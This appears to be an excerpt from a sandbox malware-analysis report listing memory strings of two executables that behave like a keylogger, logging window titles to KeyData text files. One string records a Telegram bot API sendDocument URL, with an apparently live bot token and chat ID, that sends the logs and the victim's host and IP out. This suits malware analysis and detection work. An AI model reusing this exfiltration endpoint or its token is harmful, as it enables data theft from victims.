Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:14]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <Program Manager>>Micro
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, KeyDatapMzAnAuv.txt.14.dr	Binary or memory string: [08:28:58]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:31]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, KeyDataKlWubVgv.txt.9.dr	Binary or memory string: [08:28:57]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:27:40]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"ok":true,"result":{"message_id":3900,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232531,"document":{"file_name":"KeyDataIZODtrsj.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIPPGdPB5PuccPtePoISSmk9ZJOm8rQAALzFQACM5J4UsCwuZqsv99QNgQ","file_unique_id":"AgAD8xUAAjOSeFI","file_size":429},"caption":"DC-KL:::user-PC\\user\\8.46.123.228","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}7:16]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 27:17]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, KeyDataZbCyVRJK.txt.9.dr	Binary or memory string: [08:29:06]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--1]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BFF000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3293275685.0000000005310000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:49]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:39]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:16]NHxvUmVWLAAL7FQACM5J4UjS2nI8gOHTKNgQ","file_unique_id":"AgAD-xUAAjOSeFI","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.228","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}0-99b9-fca7ff59c113--8]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:12]<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, KeyDataIZODtrsj.txt.9.dr	Binary or memory string: [08:28:48]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, KeyDataZbCyVRJK.txt.9.dr	Binary or memory string: [08:28:59]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:39<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :17]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:04]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:41]<<Program Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.22824]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:39]<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BC:\Users\user\AppData\Local\CEF[08:27:15]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003C32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:16]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:20]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:14]<<Program Manager>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:00]<<Program Manager>>8:27:20]<<Progs
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:10]<<Program Manager>>pP
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerogram Managert
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:49]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:50]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:27:22]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :28:19]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003C32000.00000004.00000020.00020000.00000000.sdmp, KeyDataLscxvYqK.txt.9.dr	Binary or memory string: [08:27:15]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:21]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:40]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003C32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:16]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:59]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:27]<<Program Manager
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:03]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003C1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerogram Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :43]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerogram ManagerB.p
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:09]<<Program Manager>
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :00]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:11]<<Program Manager>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 27:23]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:59]..Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:02]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManageroardeEM0T
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:45]<<Program Manager>>)
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :28:18]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, KeyDataPIzkdBls.txt.9.dr	Binary or memory string: [08:28:38]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, KeyDataKlWubVgv.txt.9.dr	Binary or memory string: [08:28:50]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:12]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:28]<<Program Manager
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managertxt2011ko2A[
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:06]<<Program Manager>><&
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:19]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C22000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:11]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:00]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:51]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:51]<<Program Manager
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:41]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:42]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:42]<<Program Manager>>;
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:38]<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:28]<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:27:20]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:25]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:39]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 27:21]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:08]<<Program Manager
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:24]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003C32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:18]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:17]<<Program Managert
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:01]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003C32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:17]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, KeyDatawoaulIUc.txt.14.dr	Binary or memory string: [08:28:28]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:28:03]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 08:27:46]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:19]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:43]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:00]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:51]<<Program Manager>>anC
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, KeyDatahOOyPCCl.txt.14.dr	Binary or memory string: [08:27:51]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:16]<<Program Manager
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, KeyDatapMzAnAuv.txt.14.dr	Binary or memory string: [08:28:52]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\wbem\wbemsvc.dlll27:21]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FC:\Users\user\AppData\Local\Adobe753D193B28082F181D0714131933073708:27:21]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:19]<<Program Manager
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:10]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:23]<<Program Manager@
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:25]<<Program Manager>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, KeyDataHyaLuYzE.txt.9.dr	Binary or memory string: [08:28:27]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:31]<<Program Manager>>ram Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:28:18]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:21]..Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3291638549.0000000003D43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:01]<<Program Manager>>
Source: yMvZXcwN2OdoP6x.exe, 00000009.00000002.3291155915.0000000003C3C000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003C32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:27:17]<<Program Manager>>
Source: LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [08:29:12Program Manager>>

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
